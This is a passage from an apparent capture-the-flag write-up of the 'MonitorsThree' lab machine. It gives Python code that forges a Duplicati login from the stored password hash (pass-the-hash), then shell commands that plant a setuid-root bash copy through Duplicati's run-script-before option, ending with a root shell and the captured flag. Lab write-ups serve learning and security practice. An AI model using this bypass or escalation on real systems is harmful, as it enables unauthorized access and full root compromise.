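def make_server_passphrase(password: str, salt_b64: str) -> str:
    """What ends up in the Option table as 'server-passphrase' (assumed format):
    base64(SHA256(utf8(password) || base64decode(salt)))."""
    return base64.b64encode(sha256(password.encode() + base64.b64decode(salt_b64))).decode()


def passphrase_to_hex(server_passphrase_b64: str) -> str:
    """The 'Base64 -> Hex' step from the writeup: saltedpwd as the login script wants it."""
    return base64.b64decode(server_passphrase_b64).hex()


def client_noncedpwd(password: str, salt_b64: str, nonce_b64: str) -> str:
    """Honest login flow: saltedpwd = SHA256(pw || salt),
    noncedpwd = base64(SHA256(nonce || saltedpwd))."""
    saltedpwd = sha256(password.encode() + base64.b64decode(salt_b64))
    return base64.b64encode(sha256(base64.b64decode(nonce_b64) + saltedpwd)).decode()


def forged_noncedpwd(server_passphrase_b64: str, nonce_b64: str) -> str:
    """The bypass: the stored verifier *is* saltedpwd, so the password is never needed."""
    saltedpwd = base64.b64decode(server_passphrase_b64)
    return base64.b64encode(sha256(base64.b64decode(nonce_b64) + saltedpwd)).decode()


class DuplicatiServer:
    """Minimal model of the server side: holds salt + passphrase, hands out a
    one-shot nonce, and checks SHA256(nonce || passphrase_bytes) against the answer."""

    def __init__(self, password: str):
        self.salt = base64.b64encode(os.urandom(32)).decode()
        self.server_passphrase = make_server_passphrase(password, self.salt)
        self.nonce = None

    def issue_nonce(self) -> dict:
        self.nonce = base64.b64encode(os.urandom(32)).decode()
        return {"Status": "OK", "Nonce": self.nonce, "Salt": self.salt}

    def login(self, noncedpwd: str) -> bool:
        if self.nonce is None:
            return False
        expected = sha256(base64.b64decode(self.nonce) + base64.b64decode(self.server_passphrase))
        ok = hmac.compare_digest(base64.b64encode(expected).decode(), noncedpwd)
        self.nonce = None  # nonce is single use
        return ok


def demo() -> tuple:
    """(honest login ok, pass-the-hash login ok, wrong-password login ok)."""
    server = DuplicatiServer("constructed-demo-password")
    chal = server.issue_nonce()
    honest = server.login(client_noncedpwd("constructed-demo-password", chal["Salt"], chal["Nonce"]))
    chal = server.issue_nonce()  # attacker only has the row from Duplicati-server.sqlite
    forged = server.login(forged_noncedpwd(server.server_passphrase, chal["Nonce"]))
    chal = server.issue_nonce()
    wrong = server.login(client_noncedpwd("not-the-password", chal["Salt"], chal["Nonce"]))
    return honest, forged, wrong


# Values captured in the writeup above (real data from the box, not constructed).
WRITEUP_NONCE = "HLXcNPKiAZhxGKSD4ftNwGFspaifr8geJVOZCmevpbk="
WRITEUP_PASSPHRASE = "Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho="

if __name__ == "__main__":
    print(demo())
    print(passphrase_to_hex(WRITEUP_PASSPHRASE))
    print(forged_noncedpwd(WRITEUP_PASSPHRASE, WRITEUP_NONCE))
```

The takeaway: the stored verifier is SHA256(password || salt) and the nonce round only ever hashes that verifier, so anyone who can read the config database holds a password equivalent, which is why the SQLite file was worth exfiltrating. Fed the nonce and passphrase from the steps above, `forged_noncedpwd()` reproduces the console computation.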
Backups

Duplicati can run a script before any operation (the run-script-before option). I added it globally, because we really don't care about a single backup job.
The script has to be placed in the cacti directory by www-data, because marcus has no write permissions there: we go back down the permission chain to www-data and then up to root.

www-data@monitorsthree:~/html/cacti$ mkdir t && cd t
www-data@monitorsthree:~/html/cacti/t$ echo $'#!/bin/bash\ncp /bin/bash /source/tmp/rootbash\nchmod 4777 /source/tmp/rootbash\n'
#!/bin/bash
cp /bin/bash /source/tmp/rootbash
chmod 4777 /source/tmp/rootbash
www-data@monitorsthree:~/html/cacti/t$ echo $'#!/bin/bash\ncp /bin/bash /source/tmp/rootbash\nchmod 4777 /source/tmp/rootbash\n' > t.sh
www-data@monitorsthree:~/html/cacti/t$ chmod 777 t.sh
The important step is to prefix the output path with /source, because that is where the host's / is mounted inside the container: /tmp/rootbash would land in the container's own filesystem, while /source/tmp/rootbash lands in the host's /tmp.
marcus@monitorsthree:/var/www/html/cacti$ ls -alh /tmp/rootbash
-rwsrwxrwx 1 root root 1.4M Aug 25 06:06 /tmp/rootbash
marcus@monitorsthree:/var/www/html/cacti$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)
Root.txt
rootbash-5.1# cat root.txt
f929437253024a953f17dff870ac16c4